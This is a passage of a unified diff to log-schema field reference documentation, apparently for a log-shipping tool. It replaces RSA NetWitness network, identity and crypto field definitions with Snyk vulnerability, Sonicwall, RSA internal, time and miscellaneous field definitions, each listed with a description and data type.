related Jira issue. + type: keyword -- -*`rsa.network.network_port`*:: +*`snyk.vulnerabilities.original_severity`*:: + -- -Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) +The original severity of the vulnerability. + type: long -- -*`rsa.network.eth_host`*:: +*`snyk.vulnerabilities.reachability`*:: + -- -Deprecated, use alias.mac +If the vulnerable function from the library is used in the code scanned. Can either be No Info, Potentially reachable and Reachable. + type: keyword -- -*`rsa.network.sinterface`*:: +*`snyk.vulnerabilities.title`*:: + -- -This key should only be used when it’s a Source Interface +The issue title. + type: keyword -- -*`rsa.network.dinterface`*:: +*`snyk.vulnerabilities.type`*:: + -- -This key should only be used when it’s a Destination Interface +The issue type. Can be either "license" or "vulnerability". + type: keyword -- -*`rsa.network.vlan`*:: +*`snyk.vulnerabilities.unique_severities_list`*:: + -- -This key should only be used to capture the ID of the Virtual LAN +A list of related unique severities. -type: long + +type: keyword -- -*`rsa.network.zone_src`*:: +*`snyk.vulnerabilities.version`*:: + -- -This key should only be used when it’s a Source Zone. +The package version this issue is applicable to. + type: keyword -- -*`rsa.network.zone`*:: +*`snyk.vulnerabilities.introduced_date`*:: + -- -This key should be used when the source or destination context of a Zone is not clear +The date the vulnerability was initially found. -type: keyword + +type: date -- -*`rsa.network.zone_dst`*:: +*`snyk.vulnerabilities.is_fixed`*:: + -- -This key should only be used when it’s a Destination Zone. +If the related vulnerability has been resolved. -type: keyword + +type: boolean -- -*`rsa.network.gateway`*:: +*`snyk.vulnerabilities.credit`*:: + -- -This key is used to capture the IP Address of the gateway +Reference to the person that original found the vulnerability. + type: keyword -- -*`rsa.network.icmp_type`*:: +*`snyk.vulnerabilities.semver`*:: + -- -This key is used to capture the ICMP type only +One or more semver ranges this issue is applicable to. The format varies according to package manager. -type: long + +type: flattened -- -*`rsa.network.mask`*:: +*`snyk.vulnerabilities.identifiers.alternative`*:: + -- -This key is used to capture the device network IPmask. +Additional vulnerability identifiers. + type: keyword -- -*`rsa.network.icmp_code`*:: +*`snyk.vulnerabilities.identifiers.cwe`*:: + -- -This key is used to capture the ICMP code only +CWE vulnerability identifiers. -type: long + +type: keyword -- -*`rsa.network.protocol_detail`*:: +[[exported-fields-sonicwall]] +== Sonicwall-FW fields + +sonicwall fields. + + + +*`network.interface.name`*:: + -- -This key should be used to capture additional protocol information +Name of the network interface where the traffic has been observed. + type: keyword -- -*`rsa.network.dmask`*:: + + +*`rsa.internal.msg`*:: + -- -This key is used for Destionation Device network mask +This key is used to capture the raw message that comes into the Log Decoder type: keyword -- -*`rsa.network.port`*:: +*`rsa.internal.messageid`*:: + -- -This key should only be used to capture a Network Port when the directionality is not clear - -type: long +type: keyword -- -*`rsa.network.smask`*:: +*`rsa.internal.event_desc`*:: + -- -This key is used for capturing source Network Mask - type: keyword -- -*`rsa.network.netname`*:: +*`rsa.internal.message`*:: + -- -This key is used to capture the network name associated with an IP range. This is configured by the end user. +This key captures the contents of instant messages type: keyword -- -*`rsa.network.paddr`*:: +*`rsa.internal.time`*:: + -- -Deprecated +This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. -type: ip +type: date -- -*`rsa.network.faddr`*:: +*`rsa.internal.level`*:: + -- -type: keyword +Deprecated key defined only in table map. + +type: long -- -*`rsa.network.lhost`*:: +*`rsa.internal.msg_id`*:: + -- +This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.origin`*:: +*`rsa.internal.msg_vid`*:: + -- +This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.remote_domain_id`*:: +*`rsa.internal.data`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.addr`*:: +*`rsa.internal.obj_server`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.dns_a_record`*:: +*`rsa.internal.obj_val`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.dns_ptr_record`*:: +*`rsa.internal.resource`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.fhost`*:: +*`rsa.internal.obj_id`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.fport`*:: +*`rsa.internal.statement`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.laddr`*:: +*`rsa.internal.audit_class`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.linterface`*:: +*`rsa.internal.entry`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.phost`*:: +*`rsa.internal.hcode`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.ad_computer_dst`*:: +*`rsa.internal.inode`*:: + -- -Deprecated, use host.dst +Deprecated key defined only in table map. -type: keyword +type: long -- -*`rsa.network.eth_type`*:: +*`rsa.internal.resource_class`*:: + -- -This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only +Deprecated key defined only in table map. -type: long +type: keyword -- -*`rsa.network.ip_proto`*:: +*`rsa.internal.dead`*:: + -- -This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI +Deprecated key defined only in table map. type: long -- -*`rsa.network.dns_cname_record`*:: +*`rsa.internal.feed_desc`*:: + -- +This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.dns_id`*:: +*`rsa.internal.feed_name`*:: + -- +This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.dns_opcode`*:: +*`rsa.internal.cid`*:: + -- +This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.dns_resp`*:: +*`rsa.internal.device_class`*:: + -- +This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.dns_type`*:: +*`rsa.internal.device_group`*:: + -- +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.domain1`*:: +*`rsa.internal.device_host`*:: + -- +This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.host_type`*:: +*`rsa.internal.device_ip`*:: + -- -type: keyword +This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: ip -- -*`rsa.network.packet_length`*:: +*`rsa.internal.device_ipv6`*:: + -- -type: keyword +This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: ip -- -*`rsa.network.host_orig`*:: +*`rsa.internal.device_type`*:: + -- -This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. +This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.rpayload`*:: +*`rsa.internal.device_type_id`*:: + -- -This key is used to capture the total number of payload bytes seen in the retransmitted packets. +Deprecated key defined only in table map. -type: keyword +type: long -- -*`rsa.network.vlan_name`*:: +*`rsa.internal.did`*:: + -- -This key should only be used to capture the name of the Virtual LAN +This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- +*`rsa.internal.entropy_req`*:: ++ +-- +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration + +type: long -*`rsa.investigations.ec_activity`*:: +-- + +*`rsa.internal.entropy_res`*:: + -- -This key captures the particular event activity(Ex:Logoff) +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration -type: keyword +type: long -- -*`rsa.investigations.ec_theme`*:: +*`rsa.internal.event_name`*:: + -- -This key captures the Theme of a particular Event(Ex:Authentication) +Deprecated key defined only in table map. type: keyword -- -*`rsa.investigations.ec_subject`*:: +*`rsa.internal.feed_category`*:: + -- -This key captures the Subject of a particular Event(Ex:User) +This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.investigations.ec_outcome`*:: +*`rsa.internal.forward_ip`*:: + -- -This key captures the outcome of a particular Event(Ex:Success) +This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. -type: keyword +type: ip -- -*`rsa.investigations.event_cat`*:: +*`rsa.internal.forward_ipv6`*:: + -- -This key captures the Event category number +This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: ip -- -*`rsa.investigations.event_cat_name`*:: +*`rsa.internal.header_id`*:: + -- -This key captures the event category name corresponding to the event cat code +This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.investigations.event_vcat`*:: +*`rsa.internal.lc_cid`*:: + -- -This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. +This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.investigations.analysis_file`*:: +*`rsa.internal.lc_ctime`*:: + -- -This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file +This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: date -- -*`rsa.investigations.analysis_service`*:: +*`rsa.internal.mcb_req`*:: + -- -This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service +This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most -type: keyword +type: long -- -*`rsa.investigations.analysis_session`*:: +*`rsa.internal.mcb_res`*:: + -- -This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session +This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most -type: keyword +type: long -- -*`rsa.investigations.boc`*:: +*`rsa.internal.mcbc_req`*:: + -- -This is used to capture behaviour of compromise +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams -type: keyword +type: long -- -*`rsa.investigations.eoc`*:: +*`rsa.internal.mcbc_res`*:: + -- -This is used to capture Enablers of Compromise +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams -type: keyword +type: long -- -*`rsa.investigations.inv_category`*:: +*`rsa.internal.medium`*:: + -- -This used to capture investigation category +This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session -type: keyword +type: long -- -*`rsa.investigations.inv_context`*:: +*`rsa.internal.node_name`*:: + -- -This used to capture investigation context +Deprecated key defined only in table map. type: keyword -- -*`rsa.investigations.ioc`*:: +*`rsa.internal.nwe_callback_id`*:: + -- -This is key capture indicator of compromise +This key denotes that event is endpoint related type: keyword -- - -*`rsa.counters.dclass_c1`*:: +*`rsa.internal.parse_error`*:: + -- -This is a generic counter key that should be used with the label dclass.c1.str only +This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: keyword -- -*`rsa.counters.dclass_c2`*:: +*`rsa.internal.payload_req`*:: + -- -This is a generic counter key that should be used with the label dclass.c2.str only +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep type: long -- -*`rsa.counters.event_counter`*:: +*`rsa.internal.payload_res`*:: + -- -This is used to capture the number of times an event repeated +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep type: long -- -*`rsa.counters.dclass_r1`*:: +*`rsa.internal.process_vid_dst`*:: + -- -This is a generic ratio key that should be used with the label dclass.r1.str only +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. type: keyword -- -*`rsa.counters.dclass_c3`*:: +*`rsa.internal.process_vid_src`*:: + -- -This is a generic counter key that should be used with the label dclass.c3.str only +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. -type: long +type: keyword -- -*`rsa.counters.dclass_c1_str`*:: +*`rsa.internal.rid`*:: + -- -This is a generic counter string key that should be used with the label dclass.c1 only +This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: long -- -*`rsa.counters.dclass_c2_str`*:: +*`rsa.internal.session_split`*:: + -- -This is a generic counter string key that should be used with the label dclass.c2 only +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.counters.dclass_r1_str`*:: +*`rsa.internal.site`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r1 only +Deprecated key defined only in table map. type: keyword -- -*`rsa.counters.dclass_r2`*:: +*`rsa.internal.size`*:: + -- -This is a generic ratio key that should be used with the label dclass.r2.str only +This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: long -- -*`rsa.counters.dclass_c3_str`*:: +*`rsa.internal.sourcefile`*:: + -- -This is a generic counter string key that should be used with the label dclass.c3 only +This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.counters.dclass_r3`*:: +*`rsa.internal.ubc_req`*:: + -- -This is a generic ratio key that should be used with the label dclass.r3.str only +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once -type: keyword +type: long -- -*`rsa.counters.dclass_r2_str`*:: +*`rsa.internal.ubc_res`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r2 only +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once -type: keyword +type: long -- -*`rsa.counters.dclass_r3_str`*:: +*`rsa.internal.word`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r3 only +This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log type: keyword -- -*`rsa.identity.auth_method`*:: +*`rsa.time.event_time`*:: + -- -This key is used to capture authentication methods used only +This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form -type: keyword +type: date -- -*`rsa.identity.user_role`*:: +*`rsa.time.duration_time`*:: + -- -This key is used to capture the Role of a user only +This key is used to capture the normalized duration/lifetime in seconds. -type: keyword +type: double -- -*`rsa.identity.dn`*:: +*`rsa.time.event_time_str`*:: + -- -X.500 (LDAP) Distinguished Name +This key is used to capture the incomplete time mentioned in a session as a string type: keyword -- -*`rsa.identity.logon_type`*:: +*`rsa.time.starttime`*:: + -- -This key is used to capture the type of logon method used. +This key is used to capture the Start time mentioned in a session in a standard form -type: keyword +type: date -- -*`rsa.identity.profile`*:: +*`rsa.time.month`*:: + -- -This key is used to capture the user profile - type: keyword -- -*`rsa.identity.accesses`*:: +*`rsa.time.day`*:: + -- -This key is used to capture actual privileges used in accessing an object - type: keyword -- -*`rsa.identity.realm`*:: +*`rsa.time.endtime`*:: + -- -Radius realm or similar grouping of accounts +This key is used to capture the End time mentioned in a session in a standard form -type: keyword +type: date -- -*`rsa.identity.user_sid_dst`*:: +*`rsa.time.timezone`*:: + -- -This key captures Destination User Session ID +This key is used to capture the timezone of the Event Time type: keyword -- -*`rsa.identity.dn_src`*:: +*`rsa.time.duration_str`*:: + -- -An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn +A text string version of the duration type: keyword -- -*`rsa.identity.org`*:: +*`rsa.time.date`*:: + -- -This key captures the User organization - type: keyword -- -*`rsa.identity.dn_dst`*:: +*`rsa.time.year`*:: + -- -An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn - type: keyword -- -*`rsa.identity.firstname`*:: +*`rsa.time.recorded_time`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information +The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. -type: keyword +type: date -- -*`rsa.identity.lastname`*:: +*`rsa.time.datetime`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- -*`rsa.identity.user_dept`*:: +*`rsa.time.effective_time`*:: + -- -User's Department Names only +This key is the effective time referenced by an individual event in a Standard Timestamp format -type: keyword +type: date -- -*`rsa.identity.user_sid_src`*:: +*`rsa.time.expire_time`*:: + -- -This key captures Source User Session ID +This key is the timestamp that explicitly refers to an expiration. -type: keyword +type: date -- -*`rsa.identity.federated_sp`*:: +*`rsa.time.process_time`*:: + -- -This key is the Federated Service Provider. This is the application requesting authentication. +Deprecated, use duration.time type: keyword -- -*`rsa.identity.federated_idp`*:: +*`rsa.time.hour`*:: + -- -This key is the federated Identity Provider. This is the server providing the authentication. - type: keyword -- -*`rsa.identity.logon_type_desc`*:: +*`rsa.time.min`*:: + -- -This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. - type: keyword -- -*`rsa.identity.middlename`*:: +*`rsa.time.timestamp`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- -*`rsa.identity.password`*:: +*`rsa.time.event_queue_time`*:: + -- -This key is for Passwords seen in any session, plain text or encrypted +This key is the Time that the event was queued. -type: keyword +type: date -- -*`rsa.identity.host_role`*:: +*`rsa.time.p_time1`*:: + -- -This key should only be used to capture the role of a Host Machine - type: keyword -- -*`rsa.identity.ldap`*:: +*`rsa.time.tzone`*:: + -- -This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context - type: keyword -- -*`rsa.identity.ldap_query`*:: +*`rsa.time.eventtime`*:: + -- -This key is the Search criteria from an LDAP search - type: keyword -- -*`rsa.identity.ldap_response`*:: +*`rsa.time.gmtdate`*:: + -- -This key is to capture Results from an LDAP search - type: keyword -- -*`rsa.identity.owner`*:: +*`rsa.time.gmttime`*:: + -- -This is used to capture username the process or service is running as, the author of the task - type: keyword -- -*`rsa.identity.service_account`*:: +*`rsa.time.p_date`*:: + -- -This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage - type: keyword -- - -*`rsa.email.email_dst`*:: +*`rsa.time.p_month`*:: + -- -This key is used to capture the Destination email address only, when the destination context is not clear use email - type: keyword -- -*`rsa.email.email_src`*:: +*`rsa.time.p_time`*:: + -- -This key is used to capture the source email address only, when the source context is not clear use email - type: keyword -- -*`rsa.email.subject`*:: +*`rsa.time.p_time2`*:: + -- -This key is used to capture the subject string from an Email only. - type: keyword -- -*`rsa.email.email`*:: +*`rsa.time.p_year`*:: + -- -This key is used to capture a generic email address where the source or destination context is not clear - type: keyword -- -*`rsa.email.trans_from`*:: +*`rsa.time.expire_time_str`*:: + -- -Deprecated key defined only in table map. +This key is used to capture incomplete timestamp that explicitly refers to an expiration. type: keyword -- -*`rsa.email.trans_to`*:: +*`rsa.time.stamp`*:: + -- Deprecated key defined only in table map. -type: keyword +type: date -- -*`rsa.file.privilege`*:: +*`rsa.misc.action`*:: + -- -Deprecated, use permissions - type: keyword -- -*`rsa.file.attachment`*:: +*`rsa.misc.result`*:: + -- -This key captures the attachment file name +This key is used to capture the outcome/result string value of an action in a session. type: keyword -- -*`rsa.file.filesystem`*:: +*`rsa.misc.severity`*:: + -- +This key is used to capture the severity given the session + type: keyword -- -*`rsa.file.binary`*:: +*`rsa.misc.event_type`*:: + -- -Deprecated key defined only in table map. +This key captures the event category type as specified by the event source. type: keyword -- -*`rsa.file.filename_dst`*:: +*`rsa.misc.reference_id`*:: + -- -This is used to capture name of the file targeted by the action +This key is used to capture an event id from the session directly type: keyword -- -*`rsa.file.filename_src`*:: +*`rsa.misc.version`*:: + -- -This is used to capture name of the parent filename, the file which performed the action +This key captures Version of the application or OS which is generating the event. type: keyword -- -*`rsa.file.filename_tmp`*:: +*`rsa.misc.disposition`*:: + -- +This key captures the The end state of an action. + type: keyword -- -*`rsa.file.directory_dst`*:: +*`rsa.misc.result_code`*:: + -- -This key is used to capture the directory of the target process or file +This key is used to capture the outcome/result numeric value of an action in a session type: keyword -- -*`rsa.file.directory_src`*:: +*`rsa.misc.category`*:: + -- -This key is used to capture the directory of the source process or file +This key is used to capture the category of an event given by the vendor in the session type: keyword -- -*`rsa.file.file_entropy`*:: +*`rsa.misc.obj_name`*:: + -- -This is used to capture entropy vale of a file +This is used to capture name of object -type: double +type: keyword -- -*`rsa.file.file_vendor`*:: +*`rsa.misc.obj_type`*:: + -- -This is used to capture Company name of file located in version_info +This is used to capture type of object type: keyword -- -*`rsa.file.task_name`*:: +*`rsa.misc.event_source`*:: + -- -This is used to capture name of the task +This key captures Source of the event that’s not a hostname type: keyword -- - -*`rsa.web.fqdn`*:: +*`rsa.misc.log_session_id`*:: + -- -Fully Qualified Domain Names +This key is used to capture a sessionid from the session directly type: keyword -- -*`rsa.web.web_cookie`*:: +*`rsa.misc.group`*:: + -- -This key is used to capture the Web cookies specifically. +This key captures the Group Name value type: keyword -- -*`rsa.web.alias_host`*:: +*`rsa.misc.policy_name`*:: + -- +This key is used to capture the Policy Name only. + type: keyword -- -*`rsa.web.reputation_num`*:: +*`rsa.misc.rule_name`*:: + -- -Reputation Number of an entity. Typically used for Web Domains +This key captures the Rule Name -type: double +type: keyword -- -*`rsa.web.web_ref_domain`*:: +*`rsa.misc.context`*:: + -- -Web referer's domain +This key captures Information which adds additional context to the event. type: keyword -- -*`rsa.web.web_ref_query`*:: +*`rsa.misc.change_new`*:: + -- -This key captures Web referer's query portion of the URL +This key is used to capture the new values of the attribute that’s changing in a session type: keyword -- -*`rsa.web.remote_domain`*:: +*`rsa.misc.space`*:: + -- type: keyword -- -*`rsa.web.web_ref_page`*:: +*`rsa.misc.client`*:: + -- -This key captures Web referer's page information +This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. type: keyword -- -*`rsa.web.web_ref_root`*:: +*`rsa.misc.msgIdPart1`*:: + -- -Web referer's root URL path - type: keyword -- -*`rsa.web.cn_asn_dst`*:: +*`rsa.misc.msgIdPart2`*:: + -- type: keyword -- -*`rsa.web.cn_rpackets`*:: +*`rsa.misc.change_old`*:: + -- +This key is used to capture the old value of the attribute that’s changing in a session + type: keyword -- -*`rsa.web.urlpage`*:: +*`rsa.misc.operation_id`*:: + -- +An alert number or operation number. The values should be unique and non-repeating. + type: keyword -- -*`rsa.web.urlroot`*:: +*`rsa.misc.event_state`*:: + -- +This key captures the current state of the object/item referenced within the event. Describing an on-going event. + type: keyword -- -*`rsa.web.p_url`*:: +*`rsa.misc.group_object`*:: + -- +This key captures a collection/grouping of entities. Specific usage + type: keyword -- -*`rsa.web.p_user_agent`*:: +*`rsa.misc.node`*:: + -- +Common use case is the node name within a cluster. The cluster name is reflected by the host name. + type: keyword -- -*`rsa.web.p_web_cookie`*:: +*`rsa.misc.rule`*:: + -- +This key captures the Rule number + type: keyword -- -*`rsa.web.p_web_method`*:: +*`rsa.misc.device_name`*:: + -- +This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc + type: keyword -- -*`rsa.web.p_web_referer`*:: +*`rsa.misc.param`*:: + -- +This key is the parameters passed as part of a command or application, etc. + type: keyword -- -*`rsa.web.web_extension_tmp`*:: +*`rsa.misc.change_attrib`*:: + -- +This key is used to capture the name of the attribute that’s changing in a session + type: keyword -- -*`rsa.web.web_page`*:: +*`rsa.misc.event_computer`*:: + -- +This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. + type: keyword -- - -*`rsa.threat.threat_category`*:: +*`rsa.misc.reference_id1`*:: + -- -This key captures Threat Name/Threat Category/Categorization of alert +This key is for Linked ID to be used as an addition to "reference.id" type: keyword -- -*`rsa.threat.threat_desc`*:: +*`rsa.misc.event_log`*:: + -- -This key is used to capture the threat description from the session directly or inferred +This key captures the Name of the event log type: keyword -- -*`rsa.threat.alert`*:: +*`rsa.misc.OS`*:: + -- -This key is used to capture name of the alert +This key captures the Name of the Operating System type: keyword -- -*`rsa.threat.threat_source`*:: +*`rsa.misc.terminal`*:: + -- -This key is used to capture source of the threat +This key captures the Terminal Names only type: keyword -- - -*`rsa.crypto.crypto`*:: +*`rsa.misc.msgIdPart3`*:: + -- -This key is used to capture the Encryption Type or Encryption Key only - type: keyword -- -*`rsa.crypto.cipher_src`*:: +*`rsa.misc.filter`*:: + -- -This key is for Source (Client) Cipher +This key captures Filter used to reduce result set type: keyword -- -*`rsa.crypto.cert_subject`*:: +*`rsa.misc.serial_number`*:: + -- -This key is used to capture the Certificate organization only +This key is the Serial number associated with a physical asset. type: keyword -- -*`rsa.crypto.peer`*:: +*`rsa.misc.checksum`*:: + -- -This key is for Encryption peer's IP Address +This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. type: keyword -- -*`rsa.crypto.cipher_size_src`*:: +*`rsa.misc.event_user`*:: + -- -This key captures Source (Client) Cipher Size +This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. -type: long +type: keyword -- -*`rsa.crypto.ike`*:: +*`rsa.misc.virusname`*:: + -- -IKE negotiation phase. +This key captures the name of the virus type: keyword -- -*`rsa.crypto.scheme`*:: +*`rsa.misc.content_type`*:: + -- -This key captures the Encryption scheme used +This key is used to capture Content Type only. type: keyword -- -*`rsa.crypto.peer_id`*:: +*`rsa.misc.group_id`*:: + -- -This key is for Encryption peer’s identity +This key captures Group ID Number (related to the group name) type: keyword -- -*`rsa.crypto.sig_type`*:: +*`rsa.misc.policy_id`*:: + -- -This key captures the Signature Type +This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise type: keyword -- -*`rsa.crypto.cert_issuer`*:: +*`rsa.misc.vsys`*:: + -- +This key captures Virtual System Name + type: keyword -- -*`rsa.crypto.cert_host_name`*:: +*`rsa.misc.connection_id`*:: + -- -Deprecated key defined only in table map. +This key captures the Connection ID type: keyword -- -*`rsa.crypto.cert_error`*:: +*`rsa.misc.reference_id2`*:: + -- -This key captures the Certificate Error String +This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. type: keyword -- -*`rsa.crypto.cipher_dst`*:: +*`rsa.misc.sensor`*:: + -- -This key is for Destination (Server) Cipher +This key captures Name of the sensor. Typically used in IDS/IPS based devices type: keyword -- -*`rsa.crypto.cipher_size_dst`*:: +*`rsa.misc.sig_id`*:: + -- -This key captures Destination (Server) Cipher Size +This key captures IDS/IPS Int Signature ID type: long -- -*`rsa.crypto.ssl_ver_src`*:: +*`rsa.misc.port_name`*:: + -- -Deprecated, use version +This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). type: keyword -- -*`rsa.crypto.d_certauth`*:: +*`rsa.misc.rule_group`*:: + -- -type: keyword - --- +This key captures the Rule group name -*`rsa.crypto.s_certauth`*:: -+ --- type: keyword -- -*`rsa.crypto.ike_cookie1`*:: +*`rsa.misc.risk_num`*:: + -- -ID of the negotiation — sent for ISAKMP Phase One +This key captures a Numeric Risk value -type: keyword +type: double -- -*`rsa.crypto.ike_cookie2`*:: +*`rsa.misc.trigger_val`*:: + -- -ID of the negotiation — sent for ISAKMP Phase Two +This key captures the Value of the trigger or threshold condition. type: keyword -- -*`rsa.crypto.cert_checksum`*:: +*`rsa.misc.log_session_id1`*:: + -- +This key is used to capture a Linked (Related) Session ID from the session directly + type: keyword -- -*`rsa.crypto.cert_host_cat`*:: +*`rsa.misc.comp_version`*:: + -- -This key is used for the hostname category value of a certificate +This key captures the Version level of a sub-component of a product. type: keyword -- -*`rsa.crypto.cert_serial`*:: +*`rsa.misc.content_version`*:: + -- -This key is used to capture the Certificate serial number only +This key captures Version level of a signature or database content. type: keyword -- -*`rsa.crypto.cert_status`*:: +*`rsa.misc.hardware_id`*:: + -- -This key captures Certificate validation status +This key is used to capture unique identifier for a device or system (NOT a Mac address) type: keyword -- -*`rsa.crypto.ssl_ver_dst`*:: +*`rsa.misc.risk`*:: + -- -Deprecated, use version +This key captures the non-numeric risk value type: keyword -- -*`rsa.crypto.cert_keysize`*:: +*`rsa.misc.event_id`*:: + -- type: keyword -- -*`rsa.crypto.cert_username`*:: +*`rsa.misc.reason`*:: + -- type: keyword -- -*`rsa.crypto.https_insact`*:: +*`rsa.misc.status`*:: + -- type: keyword -- -*`rsa.crypto.https_valid`*:: +*`rsa.misc.mail_id`*:: + -- +This key is used to capture the mailbox id/name + type: keyword -- -*`rsa.crypto.cert_ca`*:: +*`rsa.misc.rule_uid`*:: + -- -This key is used to capture the Certificate signing authority only +This key is the Unique Identifier for a rule. type: keyword -- -*`rsa.crypto.cert_common`*:: +*`rsa.misc.trigger_desc`*:: + -- -This key is used to capture the Certificate common name only +This key captures the Description of the trigger or threshold condition. type: keyword -- - 